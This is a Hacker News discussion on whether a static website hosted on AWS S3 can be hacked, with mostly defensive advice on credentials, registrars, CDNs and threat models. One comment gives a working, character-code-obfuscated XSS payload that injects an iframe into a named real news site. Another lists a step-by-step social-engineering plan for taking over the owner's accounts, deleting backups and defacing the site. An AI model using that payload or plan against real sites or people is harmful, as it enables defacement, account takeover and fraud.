Ask HN: Is a static site hosted on AWS S3 'hackable'?
Let's assume both the domain registrar's and AWS pwd are super strong, and that static html files are uploaded to S3 from a 'clean' computer and only from that computer. Can the site be hacked? Defaced? DDOS?
50 comments
[ 2.0 ms ] story [ 53.7 ms ] threadThere is no such thing as an unhackable system, only more and less difficult to hack systems.
Who's your threat?
Your attacker would need a backdoor or 0day into AWS itself - which while you'd be a fool to assume such a thing doesn't exist, its very unlikely to get "burned" on a run-of-the-mill website hack or defacement.
If your site is ISIS or Wikileaks or DeSpiegel or The Guardian (or some other well known considered-by-the-NSA-to-be-a-terrorist-organisation) - you wouldn't bet against the NSA having firmware backdoors in the network cards and hard drive controllers underneath AWS (as well as the hypervisor and all the available deployed virtualised images, and all the internal Amazon network hardware and the core routers at both ends of Amazon's datacenter's optical fibres).
If your threat model is closer to Anonymous or GamerGate, you're probably more at risk of your "unhackable" credentials being social engineered than a purely software hack.
But in a purely binary interpretation of your question - Yes. _Everything_ is "hackable" given a sufficiently motivated and resourced attacker.
Anything is theoretically "hackable" given enough time. What we can do is to make things difficult enough to hack that they are not worth the time.
Just don't count on something being 'unhackable'.
AFAIK there are no published flaws in S3 static hosting.
Interesting people do stuff like this "for fun":
http://dangerousprototypes.com/2013/01/19/29c3-travis-goodsp...
and this:
http://spritesmods.com/?art=hddhack
How much would you bet against the people described below having even better versions of those two hacks, and being fully aware of Amazon's supply chain?
"The book included a photograph of intercepted packages being opened by NSA agents, and an accompanying NSA document explained the packages were “redirected to a secret location” where the agents implanted surveillance beacons that secretly communicated with NSA computers." - https://firstlook.org/theintercept/2014/10/10/core-secrets/
Having said that, I suspect in light of recent Snowden releases - it seems a bunch of German and Brazilian commercial businesses who probably didn't expect they had to consider the NSA as a plausible attacker are now having exactly those discussions.
I suspect _any_ prudent CSO of any company who's commercial competitors include politically connected US companies is now wondering whether they also need to consider that risk.
The only way to hack your site is to actually be at Amazon with access to whatever disk array stores your data. As in, I'm pretty sure "inside job" is the only route left.
[1]: http://www.troyhunt.com/2015/06/understanding-http-strict-tr...
Your biggest issues with that setup will be:
1. Credential and permissions management. Don't lose control of your access keys to AWS! Set up "MFA" at the very least. If you use your AWS account for other purposes, use IAM to ensure that other users cannot access the S3 bucket with the site in it.
2. Getting that green lock (e.g. HTTPS). You can pay $800/month or something insane to Cloudfront to get a custom TLS cert on their CDN, or you can get Cloudflare's "universal ssl" for $20.
3. DDoS is not really a concern. It would be nearly impossible to DDoS an HTML-only website hosted in an S3 bucket. I'd really like to see someone try. The only thing that could happen is you get charged a bit more that month while people are DDoS'ing you. But if you're behind a CDN like Cloudfront or Cloudflare (which can cache everything because it's plain HTML), then the impact would be reduced.
4. Your Registrar suddenly becomes a huge risk. Make sure you use a secure domain registrar (ie. NOT GODADDY!), that the registrar has a "Registrar-Lock" turned on for your domain, and that your account with them has 2FA. If you screw that up, then someone might be able to socially engineer the phone rep at the registrar to transfer the domain, change the nameservers, etc. This happens depressingly often.
5. 3rd party services you use could get hacked. You'll likely import a bunch of JavaScript from other websites onto your own. If any of those websites get compromised, it might affect your website too. Make sure to use 2FA on every service you can (https://twofactorauth.org/) and minimize the amount of JavaScript/fonts/css/whatever that you load from 3rd parties (re-host it locally).
I highly recommend setting up websites this way. It's fast, easy to maintain, and incredibly secure. We do this for the trailofbits.com website and we're very happy with it. Jekyll FTW.
ps. don't forget you can use Github Pages too.
DNS hijacking and other firms of network MITM are a risk, sure, but they are so incredibly rare to see in the wild that it's outside the scope of most people's concerns. "Normal" attackers generally can't pull it off.
This isn't true. Data is being served up to web browsers over port 80. That's a web server. It might not be like any web server you've ever run ... it might not be apache or thttpd or zeus or whatever ... but there is code that is spitting out HTTP over port 80/443. That's a web server.
So let's say the S3 data is immutable, as far as the "web server" and the attacker are concerned ... that's very nice, of course, but if you have control over the web server, instead of parlaying that into control over the underlying data, just tell the web server to spit out other data.
The S3 content is still safe and unchanged, but your website is nicely defaced, since your "amazon s3 webserver" exploit is just feeding it new content.
(drastically oversimplified, of course - but be clear, if there is a web server (and there is) there is web-server-attack-surface)
tl;dr what you described is possible, I guess, but so incredibly unlikely it's not even worth thinking about.
In fact, I'd argue that most prominent hacks are of systems which are not open source.
Some very-proprietary service serving S3 content? Yeah, right.
How would you rate it, in terms of "worth thinking about", relative to USB keys picked up off of the ground to infect industrial controllers to make centrifuges wiggle the wrong way ?
Where would you stick that in, you know, in your "worth thinking about it" spectrum ?
Just curious.
Surely someone has access to this. Likely many many people. Do you know who they all are? Do you trust all of them to be neither malicious or careless.
That's not to say that S3 could not possibly be broken, but if it is, there are vastly more attractive targets for that attack than some random static site.
No, I'm not talking about an "S3 exploit". In fact, quite the opposite. I'm talking about an exploit for the web server that serves static S3 sites (and yes, it is a web server) which would serve arbitrary content instead of the underlying S3 content.
The end user doesn't care that you injected the defaced content vs. altered the underlying content - defaced is defaced.
It's not hard to write a web server that reads from persistent storage but has no need or ability to write to persistent storage. (You can give it a cache, but the cache is destroyable.) So you can attack the web server in memory (maybe), but there's no way to persist the attack. As soon as the web server gets restarted, the attack goes away, and there's also no way to spread the attack from one web server to any of the countless others.
Then it's a simple matter of load-balancing at scale and restarting these stateless web servers on a regular basis to make exploits infeasible, at least until you get to substantially more motivated and funded attackers. And Amazon is a fan of both load-balancing at scale and restarting things.
If the server transcodes images, then yes, it should do the transcoding in a throwaway sandbox that outputs some hard-to-misparse intermediate format like a raw pixel array. But S3 doesn't do transcoding.
AWS now resells domains from a selection of TLDs (generally the most common ones). They've partnered with gandi.net, who does the backend registrar stuff, but you can do it all from the Route53 AWS console. Means you can keep everything all in one place.
AFAIR, it's also under French jurisdiction, not a US one. (This might be good in case of fake DMCA takedowns, but also bad in some other cases...)
PoC: http://bit.ly/1S834lS - redirects to http://www.heute.de/#"><img src=x onerror=document.write(String.fromCharCode(60,105,102,114,97,109,101, 32,115,114,99,61,34,104,116,116,112,58,47,47,99,97,116, 46,119,119,119,46,104,101,117,116,101,46,100,101,46,109,101,111,119, 98,105,102,121,46,99,111,109,47,34,32,115,116,121,108,101,61,34,98, 111,114,100,101,114,58,32,48,59,32,119,105,100,116,104,58,32,49,48, 48,37,59,32,104,101,105,103,104,116,58,32,49,48,48,37,59,32,109,97, 114,103,105,110,58,32,45,56,112,120,59,112,111,115,105,116,105,111, 110,58,32,97,98,115,111,108,117,116,101,59,34,62))>
We just inject a iframe through the onerror handler of the <img> tag:
<iframe src="http://cat.www.heute.de.meowbify.com/" style="border: 0; width: 100%; height: 100%; margin: -8px;position: absolute;"></iframe>
In this case the site is using a outdated jQuery version, which is vulnerable to this kind of attack.
http://bugs.jquery.com/ticket/9521
Edit: Thanks :)
User styles managers can fix this per user, but I sent HN an email to let them know.
SSH guessable passwords.
HTTP daemon vulnerabilities.
Any other daemons running.
Resource exhaustion.
DNS.
Client MITM.
Route corruption.
I recommend you watch periodically for your contents to pop up on random domains (you can google for your exact texts) and file your DMCA requests as soon as they appear.
It might help to use <base> tags, absolute URL links and the likes in all of your web pages, as well as mention your domain both in textual contents and images (logo?) - that actively discourages "lazy duplicates" of your pages (but not copy/pasting your articles on a different site by hand).
Just my two cents.
Furthermore, any good browser will respect [Content Security Policies](https://developer.mozilla.org/en-US/docs/Web/Security/CSP/CS...) and not load frames to your website.
Usually it relies on ownership of some third account, e.g. email. Okay, what's the recovery process for the email account? Receiving an SMS to a particular phone number? Okay, what's the recovery process for that phone number? What's the process to get the phone number redirected?
At some point you're going to end up being able to ring up a number and tell someone a name, address, date of birth etc. Best case you ring up and they say okay we'll mail you something. Or they make you come in person and sign.
Customers lose credentials constantly, and won't tolerate being told that this means their account is unrecoverable. So there is almost always another way.
*plus (was typo) the physical protection of the systems used to access the AWS host (or any other remote host you login to). If i _really_ want to have access, i wouldn't think twice to break into your house. Generally way easier; and if you have passprhaseless public keys or saved cookies, then its party time...
1. Gather info from whois DB, google search, site spidering, going to your house and looking through your trash.
2. Ring you up - Hello I'm Joe from the tax department/credit card company/bank we need to confirm your address .. give your address .. could I please confirm you are the credit card holder, I just need the last 4 digits
3. Ring your friends, family and business contacts - use smooth talking to gather as much info as possible.
4. Ring up Amazon - oh yes I am mister XXX, I forgot my password, please can you reset it. If they don't I'll try to guess information, and glean any info out of the replies.
5. Ring up your email provider and do the same
6. Keep on ringing about 8 hours apart to make sure I get different teams, so it's fresh each time, until I had enough info to get access to the account
7. Make sure to delete all backups
8. Deface to my hearts content - change all the passwords, blah blah
--------
This is the info I'd try and gather:
* Name - probably from whois
* DOB - probably from public records search - or ringing friends
* Phone - probably from your trash or mailbox
* Last four credit card digits - probably will get from your trash, or tricking you on the phone
* Date of last payment - Probably from tricking Amazon
* Password bits - pet's name, girfriend/wife/child names and ages, keylogger in an email I sent you
But I think generally if your site is not using top 3 popular CMS-es like WP, Drupal and Joomla - this will make 99.9% of attackers to move on and scan for easier targets elsewhere.